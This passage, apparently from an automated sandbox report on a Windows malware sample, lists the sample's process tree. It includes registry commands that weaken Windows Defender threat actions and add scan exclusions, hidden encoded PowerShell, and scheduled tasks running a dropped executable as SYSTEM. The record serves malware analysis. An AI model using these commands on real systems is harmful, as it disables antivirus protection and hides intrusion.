Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"
2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:380

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
3⤵
PID:440

C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
4⤵
PID:1416

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64
3⤵
PID:4984

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32
3⤵
PID:1848

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64
3⤵
PID:1468

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32
3⤵
PID:4460

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64
3⤵
PID:3580

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32
3⤵
PID:1932

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64
3⤵
PID:1804

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32
3⤵
PID:4476

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64
3⤵
PID:60

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32
3⤵
PID:4316

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64
3⤵
PID:2236

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32
3⤵
PID:3008

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64
3⤵
PID:1648

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32
3⤵
PID:4108

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64
3⤵
PID:4252

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32
3⤵
PID:4932

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64
3⤵
PID:4684

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32
3⤵
PID:688

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64
3⤵
PID:5084

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32
3⤵
PID:1064

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64
3⤵
PID:3284

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:32
3⤵
PID:4960

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:64
3⤵
PID:1208

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:32
3⤵
PID:1616

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:64
3⤵
PID:1840

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:32
3⤵
PID:364

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:64
3⤵
PID:3392

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\MIUMVdEgyTUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\MIUMVdEgyTUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\NNMAoTKMcAkAC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\NNMAoTKMcAkAC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\RNplELueU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\RNplELueU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\bBBSFQQZU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\bBBSFQQZU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\fLdzueVMGzfAC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\fLdzueVMGzfAC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\nWWVEJXizSHU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\nWWVEJXizSHU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\rPikKiIbwrQGukIChiR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\rPikKiIbwrQGukIChiR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\rUfZlqUIdWiU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\rUfZlqUIdWiU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\uYPtQNsySKcOueCgHDR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\uYPtQNsySKcOueCgHDR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ushFnVEJKMUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ushFnVEJKMUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\evUSZSaqPkAEukVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\evUSZSaqPkAEukVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\fHdtCMTPryqSDgVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\fHdtCMTPryqSDgVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\AlfnvFYITfbBhKdCN\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\AlfnvFYITfbBhKdCN\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\VEEcyYEQYAyIstnON\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\VEEcyYEQYAyIstnON\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\WZpWNMsDzSAcKsSA\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\WZpWNMsDzSAcKsSA\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\XwIFwyvoUqntekhn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\XwIFwyvoUqntekhn\" /t REG_DWORD /d 0 /reg:64;"
2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:3400

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\MIUMVdEgyTUn" /t REG_DWORD /d 0 /reg:32
3⤵
PID:3384

C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\MIUMVdEgyTUn" /t REG_DWORD /d 0 /reg:32
4⤵
PID:3036

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\MIUMVdEgyTUn" /t REG_DWORD /d 0 /reg:64
3⤵
PID:2560

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\NNMAoTKMcAkAC" /t REG_DWORD /d 0 /reg:32
3⤵
PID:4836

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\NNMAoTKMcAkAC" /t REG_DWORD /d 0 /reg:64
3⤵
PID:780

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\RNplELueU" /t REG_DWORD /d 0 /reg:32
3⤵
PID:4468

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\RNplELueU" /t REG_DWORD /d 0 /reg:64
3⤵
PID:1800

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\bBBSFQQZU" /t REG_DWORD /d 0 /reg:32
3⤵
PID:4832

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\bBBSFQQZU" /t REG_DWORD /d 0 /reg:64
3⤵
PID:4984

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\fLdzueVMGzfAC" /t REG_DWORD /d 0 /reg:32
3⤵
PID:1848

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\fLdzueVMGzfAC" /t REG_DWORD /d 0 /reg:64
3⤵
PID:456

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\nWWVEJXizSHU2" /t REG_DWORD /d 0 /reg:32
3⤵
PID:3660

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\nWWVEJXizSHU2" /t REG_DWORD /d 0 /reg:64
3⤵
PID:836

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\rPikKiIbwrQGukIChiR" /t REG_DWORD /d 0 /reg:32
3⤵
PID:1716

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\rPikKiIbwrQGukIChiR" /t REG_DWORD /d 0 /reg:64
3⤵
PID:3220

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\rUfZlqUIdWiU2" /t REG_DWORD /d 0 /reg:32
3⤵
PID:1576

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\rUfZlqUIdWiU2" /t REG_DWORD /d 0 /reg:64
3⤵
PID:3748

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\uYPtQNsySKcOueCgHDR" /t REG_DWORD /d 0 /reg:32
3⤵
PID:1376

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\uYPtQNsySKcOueCgHDR" /t REG_DWORD /d 0 /reg:64
3⤵
PID:948

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ushFnVEJKMUn" /t REG_DWORD /d 0 /reg:32
3⤵
PID:4920

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ushFnVEJKMUn" /t REG_DWORD /d 0 /reg:64
3⤵
PID:2908

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\evUSZSaqPkAEukVB /t REG_DWORD /d 0 /reg:32
3⤵
PID:3208

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\evUSZSaqPkAEukVB /t REG_DWORD /d 0 /reg:64
3⤵
PID:1724

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\fHdtCMTPryqSDgVB /t REG_DWORD /d 0 /reg:32
3⤵
PID:2788

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\fHdtCMTPryqSDgVB /t REG_DWORD /d 0 /reg:64
3⤵
PID:4252

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
3⤵
PID:4692

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
3⤵
PID:3796

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
3⤵
PID:4896

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
3⤵
PID:1620

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\AlfnvFYITfbBhKdCN /t REG_DWORD /d 0 /reg:32
3⤵
PID:4848

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\AlfnvFYITfbBhKdCN /t REG_DWORD /d 0 /reg:64
3⤵
PID:2084

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\VEEcyYEQYAyIstnON /t REG_DWORD /d 0 /reg:32
3⤵
PID:3192

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\VEEcyYEQYAyIstnON /t REG_DWORD /d 0 /reg:64
3⤵
PID:1820

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\WZpWNMsDzSAcKsSA /t REG_DWORD /d 0 /reg:32
3⤵
PID:4616

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\WZpWNMsDzSAcKsSA /t REG_DWORD /d 0 /reg:64
3⤵
PID:1596

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\XwIFwyvoUqntekhn /t REG_DWORD /d 0 /reg:32
3⤵
PID:3600

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\XwIFwyvoUqntekhn /t REG_DWORD /d 0 /reg:64
3⤵
PID:3976

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "gLfKlUfpN" /SC once /ST 12:39:50 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
2⤵
- Scheduled Task/Job: Scheduled Task
PID:3220

C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "gLfKlUfpN"
2⤵
PID:2052

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "gLfKlUfpN"
2⤵
PID:2792

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "MhsnVFKWmmyXGZkTD" /SC once /ST 17:39:49 /RU "SYSTEM" /TR "\"C:\Windows\Temp\WZpWNMsDzSAcKsSA\JdHzeCSmzFzWXve\IxRRkPx.exe\" DG /HbHZdidWD 525403 /S" /V1 /F
2⤵
- Drops file in Windows directory
- Scheduled Task/Job: Scheduled Task
PID:4984

C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "MhsnVFKWmmyXGZkTD"
2⤵
PID:888

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3688 -s 580
2⤵
- Program crash
PID:3400

C:\Users\Admin\AppData\Local\Temp\7zS8930.tmp\Install.exe
C:\Users\Admin\AppData\Local\Temp\7zS8930.tmp\Install.exe pa /SadidQi 385137 /S
1⤵
- Executes dropped EXE
- Drops file in System32 directory
PID:3208

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
